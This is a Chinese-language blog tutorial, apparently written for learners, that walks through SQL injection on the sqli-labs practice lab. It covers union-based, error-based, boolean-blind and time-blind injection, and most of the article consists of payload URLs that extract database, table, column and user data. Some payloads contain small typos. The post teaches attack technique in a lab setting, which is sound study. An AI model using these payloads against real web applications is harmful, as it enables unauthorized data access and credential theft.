<!DOCTYPE html><html class="dark" lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="阿权"><meta name="copyright" content="阿权"><meta name="generator" content="Hexo 7.1.1"><meta name="theme" content="hexo-theme-yun"><title>sql注入(二) | 追光的人终会光芒万丈</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"starry567.github.io","root":"/","title":"阿权的小站","version":"1.10.11","mode":"dark","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"/data/sentences.json"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="联合查询和基于错误信息注入介绍少一点，主要讲解布尔盲注和时间盲注。所有举例来自sqli-labs靶场 联合查询 使用联合查询，首先我们要先通过order by得到字段数。因为使用union函数进行查询时，union前面查询语句查询的元素与后面查询语句查询的元素要数量上一样，所以我们必需要知道前面语句查询了多少个元素。  用法和上一篇一样，改变union select 1,2,database()中">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入(二)">
<meta property="og:url" content="http://starry567.github.io/2024/01/26/sql%E6%B3%A8%E5%85%A5%E4%BA%8C/index.html">
<meta property="og:site_name" content="追光的人终会光芒万丈">
<meta property="og:description" content="联合查询和基于错误信息注入介绍少一点，主要讲解布尔盲注和时间盲注。所有举例来自sqli-labs靶场 联合查询 使用联合查询，首先我们要先通过order by得到字段数。因为使用union函数进行查询时，union前面查询语句查询的元素与后面查询语句查询的元素要数量上一样，所以我们必需要知道前面语句查询了多少个元素。  用法和上一篇一样，改变union select 1,2,database()中">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-10.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-11.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-12.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-13.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-14.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-15.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-16.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-17.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-18.png">
<meta property="og:image" content="http://starry567.github.io/images/2024-2-6-19.png">
<meta property="article:published_time" content="2024-01-26T14:09:34.700Z">
<meta property="article:modified_time" content="2024-02-06T08:41:06.283Z">
<meta property="article:author" content="阿权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://starry567.github.io/images/2024-2-6-10.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="阿权"><img width="96" loading="lazy" src="/images/aquan.png" alt="阿权"></a><div class="site-author-name"><a href="/about/">阿权</a></div><span class="site-name">追光的人终会光芒万丈</span><sub class="site-subtitle">endeavor</sub><div class="site-description"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">21</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">4</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">1</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:3478201900@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://blog.csdn.net/m0_73452266" title="CSDN" target="_blank" style="color:var(--hty-text-color)"><span class="icon iconify" data-icon="ri:send-plane-2-line"></span></a></div></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2"><span class="toc-number">1.</span> <span class="toc-text">联合查询</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%E6%B3%A8%E5%85%A5"><span class="toc-number">2.</span> <span class="toc-text">基于错误信息注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-number">3.</span> <span class="toc-text">布尔盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E9%A6%96%E5%85%88%E9%80%9A%E8%BF%87length%E5%87%BD%E6%95%B0%E5%88%A4%E6%96%AD%E5%BA%93%E5%90%8D%E9%95%BF%E5%BA%A6%EF%BC%8C8"><span class="toc-number">3.0.1.</span> <span class="toc-text">1.首先通过length函数判断库名长度，8</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E9%80%9A%E8%BF%87substr%E5%87%BD%E6%95%B0%E8%8E%B7%E5%BE%97%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%EF%BC%8Csecurity"><span class="toc-number">3.0.2.</span> <span class="toc-text">2.通过substr函数获得数据库名，security</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E9%80%9A%E8%BF%87length%E5%92%8Csubstr%E9%87%8D%E5%A4%8D%E4%B8%8A%E9%9D%A2%E6%93%8D%E4%BD%9C%E5%BE%97%E5%88%B0%E8%A1%A8%E5%90%8Demails-referers-uagents-users"><span class="toc-number">3.0.3.</span> <span class="toc-text">3.通过length和substr重复上面操作得到表名emails,referers,uagents,users</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E5%86%8D%E5%BE%97%E5%88%B0%E5%AD%97%E6%AE%B5%E5%90%8D-id-username-password"><span class="toc-number">3.0.4.</span> <span class="toc-text">4.再得到字段名 id,username,password</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E6%9C%80%E5%90%8E%E5%BE%97%E5%88%B0%E5%86%85%E5%AE%B9"><span class="toc-number">3.0.5.</span> <span class="toc-text">5.最后得到内容</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">4.</span> <span class="toc-text">时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E9%A6%96%E5%85%88%E5%BE%97%E5%88%B0%E6%95%B0%E6%8D%AE%E5%BA%93%E9%95%BF%E5%BA%A6"><span class="toc-number">4.0.1.</span> <span class="toc-text">1.首先得到数据库长度</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E9%80%9A%E8%BF%87substr%E7%8C%9C%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E5%AD%97"><span class="toc-number">4.0.2.</span> <span class="toc-text">2.通过substr猜解数据库名字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%8C%9C%E8%A7%A3%E8%A1%A8%E5%90%8D"><span class="toc-number">4.0.3.</span> <span class="toc-text">3.猜解表名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E7%8C%9C%E8%A7%A3%E5%AD%97%E6%AE%B5%E5%90%8D"><span class="toc-number">4.0.4.</span> <span class="toc-text">4.猜解字段名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E7%8C%9C%E8%A7%A3%E5%86%85%E5%AE%B9"><span class="toc-number">4.0.5.</span> <span class="toc-text">5.猜解内容</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%93%E8%AF%AD"><span class="toc-number">4.1.</span> <span class="toc-text">结语</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="http://starry567.github.io/2024/01/26/sql%E6%B3%A8%E5%85%A5%E4%BA%8C/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="阿权"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="追光的人终会光芒万丈"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">sql注入(二)</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2024-01-26 22:09:34" itemprop="dateCreated datePublished" datetime="2024-01-26T22:09:34+08:00">2024-01-26</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2024-02-06 16:41:06" itemprop="dateModified" datetime="2024-02-06T16:41:06+08:00">2024-02-06</time></div><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/web/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">web</span></a></span></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><p>联合查询和基于错误信息注入介绍少一点，主要讲解布尔盲注和时间盲注。<br>所有举例来自sqli-labs靶场</p>
<h1 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h1><blockquote>
<p><strong>使用联合查询，首先我们要先通过order by得到字段数。因为使用union函数进行查询时，union前面查询语句查询的元素与后面查询语句查询的元素要数量上一样，所以我们必需要知道前面语句查询了多少个元素。</strong></p>
</blockquote>
<p>用法和上一篇一样，改变union select 1,2,database()中union后面的内容就可以得到我们要的信息<br>sqli-labs第一关：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?id=<span class="number">-1&#x27;</span> <span class="keyword">union</span> select <span class="number">1</span>,<span class="number">2</span>,group_concat(table_name) from information_schema.tables where table_schema=database()--+</span><br><span class="line">#Group_concat会将（所有table_name）作为一个整体输出</span><br></pre></td></tr></table></figure>
<p><img src="/images/2024-2-6-10.png" alt="请添加图片描述" loading="lazy"><br>因为通过修改注入命令，database(),version()等可以直接得到信息就不多举例了，可以自己多试试</p>
<h1 id="基于错误信息注入"><a href="#基于错误信息注入" class="headerlink" title="基于错误信息注入"></a>基于错误信息注入</h1><blockquote>
<p>当页面有回显时，我们可以根据报错的消息猜解sql的查询语句，从而达到注入的目的</p>
</blockquote>
<p>第三关：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/sqli-labs-master/Less-3/?id=1&#x27;</span></span><br></pre></td></tr></table></figure>


<p>加一个 ‘ 时我们可以看到报错中有’’1’’),<br><img src="/images/2024-2-6-11.png" alt="请添加图片描述" loading="lazy"></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">正常情况下sql的查询语句为  </span><br><span class="line">$sql=<span class="string">&quot;SELECT * FORM users WHERE id=&#x27;$id&#x27; LIMIT 0,1&quot;</span>; </span><br><span class="line">但是这里多了一个括号，我们可以猜其为 </span><br><span class="line">$sql=<span class="string">&quot;SELECT * FROM users WHERE id=（&#x27;$id&#x27;） LIMIT 0,1&quot;</span>;  </span><br><span class="line">那么我们在注入时就要闭合）我们要查询语句需要为： </span><br><span class="line">$sql=<span class="string">&quot;SELECT * FROM users WHERE id=（&#x27;1&#x27;) union select 1,2,3--+&#x27;） LIMIT 0,1&quot;</span>; </span><br><span class="line">于是我们注入为： </span><br><span class="line">/?id=<span class="number">-1&#x27;</span>) <span class="keyword">union</span> select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>--+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/images/2024-2-6-12.png" alt="请添加图片描述" loading="lazy">当猜解了正确的sql语句后就可以利用联合查询来获取表名，内容等信息了<br>同样有的sql语句中会用 “ ” ，因此有报错时，要多利用报错信息。</p>
<h1 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h1><blockquote>
<p>存在sql注入但是页面不会直接回显任何信息，只会返回正确和错误<br>布尔盲注就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales，也就没有了之前的报错信息。</p>
</blockquote>
<p><strong>特点：<br>    1. 存在注入点。<br>    2. 该页面或请求不会回显注入语句执行结果。<br>    3. 对数据库报错进行了处理，无论用户怎么输入都不会显示报错信息。</strong></p>
<p>sqli-labs第五关：<br>对于初学者，可以先根据答案来尝试，掌握方法后再去实践。<br>建议学的时候对着答案来尝试，一个一个猜，刚开始会怀疑自己是不是方法有问题<br>我们首先在mysql中查看我们要爆破的数据：<br><img src="/images/2024-2-6-13.png" alt="请添加图片描述" loading="lazy"></p>
<h3 id="1-首先通过length函数判断库名长度，8"><a href="#1-首先通过length函数判断库名长度，8" class="headerlink" title="1.首先通过length函数判断库名长度，8"></a>1.首先通过length函数判断库名长度，8</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/?Id=<span class="number">1</span>’ and length((select database()))&gt;<span class="number">7</span> --+</span><br><span class="line">/?Id=<span class="number">1</span>’ and length((select database()))&gt;<span class="number">9</span> --+</span><br><span class="line">或</span><br><span class="line">/?Id=<span class="number">1</span>’ and length((select database()))=<span class="number">8</span> --+</span><br><span class="line">length函数可以获取长度，后面可以用&gt; &lt; =来判断</span><br></pre></td></tr></table></figure>
<p><img src="/images/2024-2-6-14.png" alt="请添加图片描述" loading="lazy"><br><img src="/images/2024-2-6-15.png" alt="请添加图片描述" loading="lazy"></p>
<blockquote>
<p>7时页面还是正常的，当&gt;9时页面就不正确，所以得到数据库长度为8</p>
</blockquote>
<h3 id="2-通过substr函数获得数据库名，security"><a href="#2-通过substr函数获得数据库名，security" class="headerlink" title="2.通过substr函数获得数据库名，security"></a>2.通过substr函数获得数据库名，security</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">substr(参数a，参数b，参数c)截取字符串中的一个字符</span><br><span class="line">a为字符串,b为起始位置,c为截取长度，substr(“security”,<span class="number">1</span>,<span class="number">1</span>)=’s’</span><br><span class="line">/?Id=<span class="number">1</span>’ and substr((select database()),<span class="number">1</span>,<span class="number">1</span>)=’s’--+</span><br><span class="line">/?Id=<span class="number">1</span>’ and substr((select database()),<span class="number">2</span>,<span class="number">1</span>)=’e’--+</span><br><span class="line">.......</span><br><span class="line">布尔盲注就是不断的尝试，学会了原理可以自己写脚本来完成，或者使用sqlmap</span><br></pre></td></tr></table></figure>

<p><img src="/images/2024-2-6-16.png" alt="请添加图片描述" loading="lazy"></p>
<h3 id="3-通过length和substr重复上面操作得到表名emails-referers-uagents-users"><a href="#3-通过length和substr重复上面操作得到表名emails-referers-uagents-users" class="headerlink" title="3.通过length和substr重复上面操作得到表名emails,referers,uagents,users"></a>3.通过length和substr重复上面操作得到表名emails,referers,uagents,users</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?Id=<span class="number">1</span>’	and	length((select	 group_concat(table_name)	from information_schema.tables where schema_name=’security’))&gt;<span class="number">1</span>--+得到长度</span><br><span class="line">/?id=<span class="number">1</span>’ and substr((select group_concat(table_name) from information_schema.tables where schema_name=’security’))=’e’--+得到表单名</span><br></pre></td></tr></table></figure>
<h3 id="4-再得到字段名-id-username-password"><a href="#4-再得到字段名-id-username-password" class="headerlink" title="4.再得到字段名 id,username,password"></a>4.再得到字段名 id,username,password</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?id=<span class="number">1</span>’ and length((select group_concat(column_name) from information_schema.columns where table_name=’users’))&gt;<span class="number">1</span>--+</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<h3 id="5-最后得到内容"><a href="#5-最后得到内容" class="headerlink" title="5.最后得到内容"></a>5.最后得到内容</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?Id=<span class="number">1</span>’ and substr((select group_concat(username) from users))=’d’--+</span><br></pre></td></tr></table></figure>
<h1 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h1><blockquote>
<p>布尔盲注返回值只有ture或false，而时间盲注只有一种返回。 但是页面返回的时间会有区别。</p>
</blockquote>
<p><strong>特点：</strong><br><strong>1. 无法确定参数的传入类型。整型，加单引号，加双引号返回结果都一样<br>    2. 不会回显注入语句执行结果<br>    3. 不会显示报错信息<br>    4. 符合盲注的特征，但不属于布尔型盲注</strong><br>时间盲注的核心语句：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(查询语句,sleep(<span class="number">5</span>),<span class="number">1</span>)</span><br><span class="line"><span class="keyword">if</span>(expr1,expr2,expr3)：判断语句，如果第一个语句正确就执行第二个语句，如果错误执行第三个语句</span><br><span class="line">sleep(n)      将程序挂起一段时间 n单位为秒</span><br></pre></td></tr></table></figure>
<p>sqli-labs第九关<br>关于语句执行的时间我们可以在控制台的网络中查看。<br>首先我们就以数据库security长度为例：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>我们用一个正确的一个错误查看相应时间：</span><br><span class="line">/?id=<span class="number">1&#x27;</span> and <span class="keyword">if</span>(length(database())=<span class="number">8</span>,sleep(<span class="number">5</span>),<span class="number">1</span>)--+</span><br><span class="line">/?id=<span class="number">1&#x27;</span> and <span class="keyword">if</span>(length(database())=<span class="number">7</span>,sleep(<span class="number">5</span>),<span class="number">1</span>)--+</span><br></pre></td></tr></table></figure>
<p><img src="/images/2024-2-6-17.png" alt="请添加图片描述" loading="lazy"><br><img src="/images/2024-2-6-18.png" alt="请添加图片描述" loading="lazy"><br>这里我们看到为8的时候，为正确的，执行了sleep，响应时间明显的变长了。当为7时，语句错误，直接结束了，响应时间就很短。<br>到这里你应该可以想到接下来和布尔盲注差不多了</p>
<h3 id="1-首先得到数据库长度"><a href="#1-首先得到数据库长度" class="headerlink" title="1.首先得到数据库长度"></a>1.首先得到数据库长度</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">1&#x27;</span> and <span class="keyword">if</span>(leng(database())=<span class="number">8</span>,sleep(<span class="number">5</span>),<span class="number">1</span>)--+</span><br><span class="line">这个<span class="number">8</span>是不断尝试得到的，不是固定的。</span><br></pre></td></tr></table></figure>

<h3 id="2-通过substr猜解数据库名字"><a href="#2-通过substr猜解数据库名字" class="headerlink" title="2.通过substr猜解数据库名字"></a>2.通过substr猜解数据库名字</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/?id=<span class="number">1&#x27;</span> and <span class="keyword">if</span>(substr(database(),<span class="number">1</span>,<span class="number">1</span>)=<span class="string">&#x27;s&#x27;</span>,sleep(<span class="number">5</span>),<span class="number">1</span>)--+</span><br><span class="line">/?id=<span class="number">1&#x27;</span> and <span class="keyword">if</span>(substr(database(),<span class="number">2</span>,<span class="number">1</span>)=<span class="string">&#x27;e&#x27;</span>,sleep(<span class="number">5</span>),<span class="number">1</span>)--+</span><br><span class="line">.........</span><br></pre></td></tr></table></figure>

<h3 id="3-猜解表名"><a href="#3-猜解表名" class="headerlink" title="3.猜解表名"></a>3.猜解表名</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?id=<span class="number">1&#x27;</span> and <span class="keyword">if</span>(length((select group_concat(table_name) from information_schema.tables where table_schema=database())),sleep(<span class="number">5</span>),<span class="number">1</span>)--+</span><br><span class="line">得到表长度</span><br></pre></td></tr></table></figure>
<p>然后通过substr得到表名<br><img src="/images/2024-2-6-19.png" alt="请添加图片描述" loading="lazy"></p>
<h3 id="4-猜解字段名"><a href="#4-猜解字段名" class="headerlink" title="4.猜解字段名"></a>4.猜解字段名</h3><h3 id="5-猜解内容"><a href="#5-猜解内容" class="headerlink" title="5.猜解内容"></a>5.猜解内容</h3><p>最后两步和上面操作类似。</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>学完原理，你会发现布尔盲注和时间盲注想要一个一个去试，太费时间了，因此可以自己尝试编写脚本去完成，同样关于sql注入还有一个比较好用的工具大家可以去了解一下，sqlmap。<br>sqlmap的简单用法和思路可以看看文章：sqlmap的使用</p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>阿权</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://starry567.github.io/2024/01/26/sql%E6%B3%A8%E5%85%A5%E4%BA%8C/" title="sql注入(二)">http://starry567.github.io/2024/01/26/sql%E6%B3%A8%E5%85%A5%E4%BA%8C/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2024/01/26/%E6%B1%87%E7%BC%96-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="prev" title="汇编-基础知识"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">汇编-基础知识</span></a></div><div class="post-nav-item"></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2024 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> 阿权</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.1.1</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a></body></html>